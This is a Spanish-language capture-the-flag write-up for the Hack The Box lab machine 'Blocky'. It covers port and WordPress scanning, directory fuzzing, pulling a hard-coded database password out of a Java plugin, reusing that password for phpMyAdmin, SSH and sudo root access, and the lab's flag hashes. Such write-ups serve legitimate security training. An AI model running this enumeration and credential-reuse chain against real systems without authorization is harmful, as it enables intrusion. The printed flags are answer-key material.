Blocky [EASY🟢]

Dificultad: Fácil

1- Reconocimiento y escaneo

`1.1 Ping`

┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# ping -c 1 10.10.10.37            
PING 10.10.10.37 (10.10.10.37) 56(84) bytes of data.
64 bytes from 10.10.10.37: icmp_seq=1 ttl=63 time=173 ms

--- 10.10.10.37 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 172.733/172.733/172.733/0.000 ms

Podemos notar que se trata de una maquina Linux, debido al TTL:

TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)

`1.2 Nmap`

┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.37 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 20:02 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:02
Completed Parallel DNS resolution of 1 host. at 20:02, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:02
Scanning 10.10.10.37 [65535 ports]
Discovered open port 80/tcp on 10.10.10.37
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 25565/tcp on 10.10.10.37
Completed SYN Stealth Scan at 20:02, 26.49s elapsed (65535 total ports)
Initiating Service scan at 20:02
Scanning 4 services on 10.10.10.37
Completed Service scan at 20:02, 6.46s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.37.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:03, 5.22s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 1.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
Nmap scan report for 10.10.10.37
Host is up, received user-set (0.18s latency).
Scanned at 2025-03-04 20:02:25 -03 for 40s
Not shown: 65530 filtered tcp ports (no-response), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE   REASON         VERSION
21/tcp    open  ftp       syn-ack ttl 63 ProFTPD 1.3.5a
22/tcp    open  ssh       syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8=
|   256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj
80/tcp    open  http      syn-ack ttl 63 Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
25565/tcp open  minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.54 seconds
           Raw packets sent: 131083 (5.768MB) | Rcvd: 23 (1.008KB)

Se ven puertos como el 21(ProFTPD 1.3.5a) correspondiente a un servidor FTP para transferencia de archivos, el puerto 22(OpenSSH 7.2p2) correspondiente a un servidor SSH para control remoto vía consola, el puerto 80(Apache httpd 2.4.18) correspondiente a un servidor web y por ultimo y no menos interesante, el puerto 25565(Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)) correspondiente a un servidor de Minecraft para la versión 1.11.2

`1.3 whatweb`

Antes de realizar el escaneo con whatweb para ver las tecnologías webs utilizadas, vamos a hacer que el dominio "http://blocky.htb/" apunte a la IP de la maquina de Hack The Box(10.10.10.37), para eso vamos a modificar el archivo "/etc/hosts":

┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# nvim /etc/hosts                                                                
                                                                                                                                                    
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       t0mz


# HACK THE BOX
10.10.10.37     blocky.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
                                                                                                                                                    
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─#

Vamos a ingresar al sitio web alojado en el puerto 80 mediante Firefox con el dominio correspondiente:

Y ahora si vamos a realizar el escaneo de whatweb al dominio "http://blocky.htb/":

┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# whatweb http://blocky.htb/              
http://blocky.htb/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.37], JQuery[1.12.4], MetaGenerator[WordPress 4.8], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[BlockyCraft &#8211; Under Construction!], UncommonHeaders[link], WordPress[4.8]
                                                                                                                                                    
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─#

Tenemos tecnologías web como:

Apache 2.4.18
JQuery
WordPress 4.8

`1.4 wpscan`

Al ser una pagina web hecha con el CMS de WordPress en su versión 4.8, vamos a utilizar la herramienta para escanear WordPress llamada "wpscan", utilizamos el siguiente comando:

wpscan --url http://blocky.htb/ -e p --plugins-detection aggressive

❯ wpscan --url http://blocky.htb/ -e p --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://blocky.htb/ [10.10.10.37]
[+] Started: Tue Mar  4 23:05:14 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blocky.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blocky.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blocky.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blocky.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blocky.htb/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
 |  - http://blocky.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://blocky.htb/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-11-12T00:00:00.000Z
 | Readme: http://blocky.htb/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.8
 | Style URL: http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:54 <====================================================================================================> (1500 / 1500) 100.00% Time: 00:00:54
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://blocky.htb/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://blocky.htb/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blocky.htb/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.3.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://blocky.htb/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://blocky.htb/wp-content/plugins/akismet/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Mar  4 23:06:23 2025
[+] Requests Done: 1553
[+] Cached Requests: 7
[+] Data Sent: 411.154 KB
[+] Data Received: 22.418 MB
[+] Memory used: 253.656 MB
[+] Elapsed time: 00:01:08

Vemos un plugin llamado "akismet" en su versión 3.3.2

`1.5 Fuzzing`

wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://blocky.htb/FUZZ

❯ wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://blocky.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://blocky.htb/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                              
=====================================================================

000000014:   200        313 L    3592 W     52224 Ch    "http://blocky.htb/"                                                                                                 
000000012:   200        313 L    3592 W     52224 Ch    "# on atleast 2 different hosts"                                                                                     
000000003:   200        313 L    3592 W     52224 Ch    "# Copyright 2007 James Fisher"                                                                                      
000000007:   200        313 L    3592 W     52224 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                    
000000013:   200        313 L    3592 W     52224 Ch    "#"                                                                                                                  
000000011:   200        313 L    3592 W     52224 Ch    "# Priority ordered case sensative list, where entries were found"                                                   
000000241:   301        9 L      28 W       313 Ch      "wp-content"                                                                                                         
000000009:   200        313 L    3592 W     52224 Ch    "# Suite 300, San Francisco, California, 94105, USA."                                                                
000000010:   200        313 L    3592 W     52224 Ch    "#"                                                                                                                  
000000006:   200        313 L    3592 W     52224 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                      
000000002:   200        313 L    3592 W     52224 Ch    "#"                                                                                                                  
000000005:   200        313 L    3592 W     52224 Ch    "# This work is licensed under the Creative Commons"                                                                 
000000008:   200        313 L    3592 W     52224 Ch    "# or send a letter to Creative Commons, 171 Second Street,"                                                         
000000004:   200        313 L    3592 W     52224 Ch    "#"                                                                                                                  
000000001:   200        313 L    3592 W     52224 Ch    "# directory-list-2.3-medium.txt"                                                                                    
000000519:   301        9 L      28 W       310 Ch      "plugins"                                                                                                            
000000786:   301        9 L      28 W       314 Ch      "wp-includes"                                                                                                        
000001073:   301        9 L      28 W       313 Ch      "javascript"                                                                                                         
000000190:   301        9 L      28 W       307 Ch      "wiki"                                                                                                               
000010825:   301        9 L      28 W       313 Ch      "phpmyadmin"                                                                                                         
000007180:   301        9 L      28 W       311 Ch      "wp-admin"                                                                                                           
000045240:   200        313 L    3592 W     52224 Ch    "http://blocky.htb/"                                                                                                 
000095524:   403        11 L     32 W       298 Ch      "server-status"                                                                                                      

Total time: 349.7403
Processed Requests: 220560
Filtered Requests: 220537
Requests/sec.: 630.6392

Vemos directorios interesantes, como el de "plugins" o el "phpmyadmin" que revisando el código fuente, es la versión 4.5.4

2- Explotación

`2.1 BlockyCore.jar`

Vamos a irnos a la URL "http://blocky.htb/plugins", directorio encontrado donde realizamos el fuzzing del sitio web:

Vemos 2 plugins, concretamente el que nos interesa es el "BlockyCore.jar", asi que vamos a bajárnoslo dandole click:

❯ ls -la
drwxrwxr-x t0mz t0mz 4.0 KB Tue Mar  4 23:26:15 2025  .
drwxrwxr-x t0mz t0mz 4.0 KB Tue Mar  4 22:46:58 2025  ..
.rwxrwxrwx t0mz t0mz 883 B  Tue Mar  4 23:25:31 2025  BlockyCore.jar
.rw-rw-r-- t0mz t0mz 2.1 KB Tue Mar  4 22:48:50 2025  escaneo.txt
.rw-rw-r-- t0mz t0mz 263 B  Tue Mar  4 22:55:33 2025  ping.txt
.rw-rw-r-- t0mz t0mz 964 B  Tue Mar  4 22:54:49 2025  whatweb.txt

Vamos a extraerlo con 7zip de GNU/Linux, con el comando "7z x BlockyCore.jar":

❯ 7z x BlockyCore.jar

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 883 bytes (1 KiB)

Extracting archive: BlockyCore.jar
--
Path = BlockyCore.jar
Type = zip
Physical Size = 883

Everything is Ok

Files: 2
Size:       964
Compressed: 883
❯ ls
 com   META-INF   BlockyCore.jar

Vamos a irnos al directorio "com" de lo extraido anteriomente y listamos los directorios:

❯ cd com
❯ ls
 myfirstplugin

Vamos al directorio "myfirstplugin":

❯ cd myfirstplugin
❯ ls
 BlockyCore.class

Vamos a hacerle un "strings" al archivo "BlockyCore.class", ya que no podemos hacerle un "cat" debido a que es una clase de Java en POO:

❯ strings BlockyCore.class
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
	localhost	
root	
8YsqfCTnvxAUeduzjNSXe22	
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java

Parecen verse unas credenciales por sentido comun:

root	
8YsqfCTnvxAUeduzjNSXe22

Si recordamos, teníamos el directorio de "phpmyadmin", que es una aplicación web hecha en PHP para gestión de bases de datos, vamos a intentar ingresar estas credenciales dentro del login de "phpmyadmin", "http://blocky.htb/phpmyadmin":

Nos ingresa correctamente:

`2.2 Intrusión por SSH`

Ya tenemos una contraseña que podríamos utilizar para logearnos mediante SSH, ahora lo que nos faltaría es obtener algún usuario del sistema, para eso revisaremos las base de datos de WordPress que esta dentro de "phpmyadmin", concretamente en la tabla de "wp_users":

Vemos un usuario llamado "notch", vamos a logearnos entonces con ese usuario, de tal manera que las credenciales quedarian de la siguiente forma:

Uusuario: notch
Password: 8YsqfCTnvxAUeduzjNSXe22

Nos logeamos vía SSH:

❯ ssh notch@10.10.10.37
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:8: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ED25519) to the list of known hosts.
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$

`2.3 Obtención de la flag user`

La flag de user se encuentra dentro de la carpeta personal del usuario "notch", si listamos los directorios ni bien nos logeamos en SSH:

notch@Blocky:~$ ls
minecraft  user.txt
notch@Blocky:~$

Esta la flag user.txt, vamos a visualizarla con cat:

notch@Blocky:~$ cat user.txt 
48bdc9c15b8de2adad3ed7257d534dc6
notch@Blocky:~$

3- Escalado de privilegios

`3.1 sudo su`

La contraseña de root, es la misma:

Uusuario: notch
Password: 8YsqfCTnvxAUeduzjNSXe22

Podemos utilizar "sudo su" para convertirnos en usuario root y pasarle la contraseña que encontramos:

notch@Blocky:~$ sudo su
[sudo] password for notch: 
root@Blocky:/home/notch#

La contraseña se encuentra en la siguiente ruta:

root@Blocky:/home/notch# find / -name root.txt 2>/dev/null
/root/root.txt
root@Blocky:/home/notch# cat /root/root.txt
5436e40a724c042f72f867a4c0d7977e
root@Blocky:/home/notch#

Con esto, concluimos la maquina "Blocky" de Hack The Box

Espero te haya sido de ayuda este Write Up :)

Si tuviste alguna dificultad a la hora de resolverlo, no olvides contactarme en mis redes sociales

https://www.hackthebox.com/achievement/machine/2243466/48www.hackthebox.com

AnteriorBroker [EASY🟢]SiguienteForest [EASY🟢]

Última actualización hace 9 meses